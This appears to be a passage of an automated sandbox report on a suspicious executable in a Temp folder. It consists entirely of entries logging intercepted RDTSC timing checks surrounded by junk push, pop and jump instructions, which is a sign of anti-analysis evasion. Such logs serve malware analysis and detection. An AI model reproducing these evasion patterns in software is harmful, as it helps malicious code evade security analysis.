Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC5FF4 second address: DC5FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8FAC second address: DC8FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 jc 00007FC4CC910586h 0x0000000e js 00007FC4CC910586h 0x00000014 pop eax 0x00000015 popad 0x00000016 pushad 0x00000017 push edx 0x00000018 jp 00007FC4CC910586h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8FCC second address: DC8FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 jmp 00007FC4CCEF6ADCh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8FE1 second address: DC8FE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC887B second address: DC8884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8884 second address: DC8888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8888 second address: DC888E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8A3C second address: DC8A42 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DC8A42 second address: DC8A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD0C80 second address: DD0CB7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910591h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FC4CC910596h 0x00000011 pushad 0x00000012 jp 00007FC4CC910586h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD0CB7 second address: DD0CEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FC4CCEF6AD6h 0x0000000a jmp 00007FC4CCEF6AE4h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC4CCEF6AE4h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD0CEE second address: DD0CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF558 second address: DCF564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF564 second address: DCF56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF56C second address: DCF577 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF577 second address: DCF57C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF57C second address: DCF584 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCF7FE second address: DCF80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FC4CC910586h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFB2D second address: DCFB3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC4CCEF6AD6h 0x0000000a jg 00007FC4CCEF6AD6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFB3F second address: DCFB44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFB44 second address: DCFB6D instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4CCEF6AEAh 0x00000008 pushad 0x00000009 jnl 00007FC4CCEF6AD6h 0x0000000f push edx 0x00000010 pop edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFE0D second address: DCFE11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFE11 second address: DCFE15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DCFE15 second address: DCFE1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD098C second address: DD099A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CCEF6ADAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD099A second address: DD09A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jl 00007FC4CC910586h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD09A8 second address: DD09AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD09AC second address: DD09B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD09B2 second address: DD09B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD222D second address: DD2238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC4CC910586h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD5E63 second address: DD5E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD4FCF second address: DD4FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push edi 0x0000000a pop edi 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007FC4CC910586h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD4FE3 second address: DD4FED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FC4CCEF6AD6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD526D second address: DD5280 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC4CC910586h 0x00000008 jp 00007FC4CC910586h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD571E second address: DD5724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD5AC4 second address: DD5AFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CC910598h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC4CC910596h 0x00000011 jp 00007FC4CC910586h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DD5AFF second address: DD5B17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC4CCEF6ADCh 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DDA3CD second address: DDA3D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DDA3D1 second address: DDA3EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FC4CCEF6ADFh 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DDA3EF second address: DDA40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC4CC910595h 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1707 second address: DE1728 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CCEF6AE1h 0x00000007 je 00007FC4CCEF6AD6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1728 second address: DE174E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC4CC910586h 0x00000008 jmp 00007FC4CC910599h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE174E second address: DE177B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC4CCEF6AD6h 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FC4CCEF6ADEh 0x00000012 pushad 0x00000013 jne 00007FC4CCEF6AD6h 0x00000019 jp 00007FC4CCEF6AD6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE177B second address: DE177F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1A74 second address: DE1A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1C18 second address: DE1C3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC4CC910586h 0x00000009 jmp 00007FC4CC91058Dh 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FC4CC910586h 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1C3B second address: DE1C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1F0F second address: DE1F27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC4CC91058Fh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE1F27 second address: DE1F2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE2384 second address: DE23A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC4CC910599h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE24F1 second address: DE24FB instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC4CCEF6AD6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE32E2 second address: DE32FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC4CC910596h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE32FF second address: DE3314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jno 00007FC4CCEF6AD6h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE9F80 second address: DE9F84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE9F84 second address: DE9F88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE9F88 second address: DE9F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC4CC91058Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DE9F9E second address: DE9FA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF71E2 second address: DF71EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF71EB second address: DF71F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF6C8B second address: DF6CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC4CC910592h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF6CA4 second address: DF6CAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF6CAA second address: DF6CB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jno 00007FC4CC910586h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF6CB6 second address: DF6CBA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF97F3 second address: DF97FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF97FB second address: DF9805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF9805 second address: DF980D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF9659 second address: DF965F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF965F second address: DF9665 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DF9665 second address: DF9673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC4CCEF6ADAh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DFD07B second address: DFD08E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC4CC91058Eh 0x0000000b jp 00007FC4CC910586h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DFD08E second address: DFD096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DFD096 second address: DFD09A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: DFCC4A second address: DFCC4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0441A second address: E0441F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0441F second address: E04424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E04424 second address: E0442A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0442A second address: E04430 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0CBAA second address: E0CBCB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FC4CC910599h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0CBCB second address: E0CBDD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC4CCEF6AD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E0CBDD second address: E0CBEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E13EDE second address: E13EF3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC4CCEF6AD8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnp 00007FC4CCEF6AD6h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\TempOETCKHM63IHLT61XCGSDOYNXXWXVKNO8.EXE RDTSC instruction interceptor: First address: E13EF3 second address: E13F10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC4CC910592h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
